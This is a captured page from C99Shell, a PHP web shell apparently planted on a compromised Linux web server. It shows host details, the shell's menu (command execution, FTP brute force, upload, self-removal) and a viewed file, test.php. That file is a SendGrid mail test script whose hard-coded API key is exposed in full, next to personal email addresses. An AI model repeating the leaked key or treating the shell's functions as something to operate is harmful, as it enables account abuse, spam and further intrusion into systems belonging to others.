!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.18.0. PHP/7.4.29 

uname -a: Linux ip-172-31-23-220 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/   drwxr-xr-x
Free 39.75 GB of 48.28 GB (82.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     test.php (1.41 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

//require 'vendor/autoload.php'; // If you're using Composer (recommended) 
// Comment out the above line if not using Composer 
echo 'start';
require(
"sendgrid/sendgrid-php.php");
// If not using Composer, uncomment the above line and
// download sendgrid-php.zip from the latest release here,
// replacing <PATH TO> with the path to the sendgrid-php.php file,
// which is included in the download:
// https://github.com/sendgrid/sendgrid-php/releases

//$sendgrid = new SendGrid('sendgrid api key');


//$email = new \SendGrid\Mail\Mail(); 
echo 'after';

$email = new SendGrid\Email();

echo 
'4';
$email->setFrom("test@srishticampus.com""Srishti Campus Test User");
$email->setSubject("Sending with SendGrid is Fun");
$email->addTo("raj.srishtis@gmail.com""Example User");
$email->addContent("text/plain""and easy to do anywhere, even with PHP");
$email->addContent(
    
"text/html""<strong>and easy to do anywhere, even with PHP</strong>"
);
//$sendgrid = new \SendGrid('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');
$sendgrid = new SendGrid('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');

try {
    
$response $sendgrid->send($email);
    print 
$response->statusCode() . "\n";
    
print_r($response->headers());
    print 
$response->body() . "\n";
} catch (
Exception $e) {
    echo 
'Caught exception: '$e->getMessage() ."\n";
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0067 ]--